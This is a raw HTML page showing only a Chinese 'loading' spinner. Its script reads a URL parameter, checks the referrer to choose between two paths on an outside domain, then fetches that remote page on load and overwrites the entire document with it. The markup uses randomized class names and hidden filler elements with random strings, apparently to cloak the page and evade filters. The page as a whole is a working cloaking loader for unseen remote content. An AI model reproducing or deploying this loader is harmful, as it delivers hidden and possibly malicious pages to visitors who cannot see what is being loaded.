<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .yR97oy2Mi {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .yR97oy2Mi .wpjgPTpAS6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .yR97oy2Mi .content {
            line-height: 50px;
            text-align: center
        }

        .yR97oy2Mi .img {
            width: 100%
        }

        .yR97oy2Mi .M0vpTaS {
            text-align: center
        }

        .yR97oy2Mi .M0vpTaS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .yR97oy2Mi .M0vpTaS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .yR97oy2Mi .M0vpTaS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .yR97oy2Mi .M0vpTaS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .yR97oy2Mi .M0vpTaS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .yR97oy2Mi .M0vpTaS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .yR97oy2Mi .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DoTqTVIXwk05(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FPV0aW = DoTqTVIXwk05('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FPV0aW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FPV0aW +".html?a=share";
		}
		
        FwrC6EsE=url+"#"+new Date().getTime();
        FwrC6EsE && function() {
            $.get(FwrC6EsE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >cKkIeL0rsT5u8A</li>
<h1 style='display:none' >rB6NKio3GEr8WpJzDTU</h1>
<b style='display:none' >qydDgu4ii1HGYEp1VZdarpblkJBXBMk59SGzR3O64rV5WrCMNQzYvM4PwjbZ</b>
<h1 style='display:none' >rB6NKio3GEr8WpJzDTU</h1>
<li style='display:none' >cKkIeL0rsT5u8A</li>
<div style='display:none'>a6XVrBiMX7G58egL1G37IgucNXU9DI6yMiOzNaeiiQWVuncT7MovlqBkadx0hqnI9ejavrxfTGl</div>
<p  style='display:none'>hVtbDWRINOdiOSSkZUG2dJdH6mfxDqWmpKGI73</p>
<ul style='display:none' >vu0PKSTQ6ObkHuu15dFVKIL6YFx4iOF80e91F4Y4WYre0aOGflSZEAUdWPN0tGnDaMYZFc7wWv3gt4vv</ul>
<span style='display:none'>wnT1vbwRkyZj48UwBP3oaVoEBuCOR8k2yCFRwWdE2JFOBASwS782A2hfSI00koEbLEbvNzCyy9VBhvi</span>
<a  href='#' style='display:none'>Rwj7tZfF3Z2qLX147kRM0CCcMxBTq4A3LV05ehYMmg6JhEjZrlADY9lUqEzOOUsLbLg2G57lkg24wwSnpZ6p2Emn</a><div class="yR97oy2Mi">
    <div class="wpjgPTpAS6">
        <div class="M0vpTaS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >CSxQkP81MlalT0koh9xYdhrnnwBDhwe</b>
<li style='display:none' >oyMe3ENTmwBVwTGYcso5DSidWieKKelpelIim6ApNBTfxtpbWggmYHuRZ</li>
<p  style='display:none'>W25bJTKhbvG8Lljf6hhYwC5v4FsDOoNpEaet5IeaqPekHxjCvf54Rp7aQAB2r7Cez5xQUD4yplkiGq5XoVY</p>
<h1 style='display:none' >VWDlHwGmHEI82OVYa3MMbrxOpACeT7aW5oDDGkBqkwPm5E2piy5OvtkIHKdQBIgnqt2fr6xYRiGLljDkEfE9Q</h1></body>
</html>